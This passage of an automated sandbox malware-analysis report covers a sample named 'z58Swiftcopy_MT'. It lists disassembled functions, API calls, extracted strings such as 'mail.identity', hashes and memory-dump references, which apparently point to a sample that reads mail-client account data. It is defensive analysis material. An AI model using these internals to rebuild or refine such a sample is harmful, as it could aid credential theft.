                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                                                      Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                                                      Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                                                                      Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                      • API String ID: 2221118986-515162456
                                                                                                                                                                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                                                                      Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3503910906-0
                                                                                                                                                                                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                                                                      Function 00407CBC Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00407D7C
                                                                                                                                                                                                                                        • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`-v,00407A43,00000001,?,00000000,`-v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$mallocmemcpy
                                                                                                                                                                                                                                      • String ID: `-v$`-v$`-v
                                                                                                                                                                                                                                      • API String ID: 3401966785-2491953119
                                                                                                                                                                                                                                      • Opcode ID: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                                                                                                                                                                                                                      • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96
                                                                                                                                                                                                                                      Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3798638045-0
                                                                                                                                                                                                                                      • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                                                                      Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                                      • atoi.MSVCRT(?,00000000,?,762D0A60,?,00000000), ref: 0040B619
                                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4107816708-0
                                                                                                                                                                                                                                      • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                                                                      Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                                                                                                      • API String ID: 39653677-3911187716
                                                                                                                                                                                                                                      • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                                                                      Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                                                                      Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                                      • String ID: C@$mail.identity
                                                                                                                                                                                                                                      • API String ID: 1439213657-721921413
                                                                                                                                                                                                                                      • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                                                                      Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                                      • String ID: Ul@
                                                                                                                                                                                                                                      • API String ID: 270934217-715280498
                                                                                                                                                                                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                                                                      Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,762D0A60), ref: 00408EBE
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 203655857-0
                                                                                                                                                                                                                                      • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                                                                      Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _ultoasprintf
                                                                                                                                                                                                                                      • String ID: %s %s %s
                                                                                                                                                                                                                                      • API String ID: 432394123-3850900253
                                                                                                                                                                                                                                      • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                                                                      Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
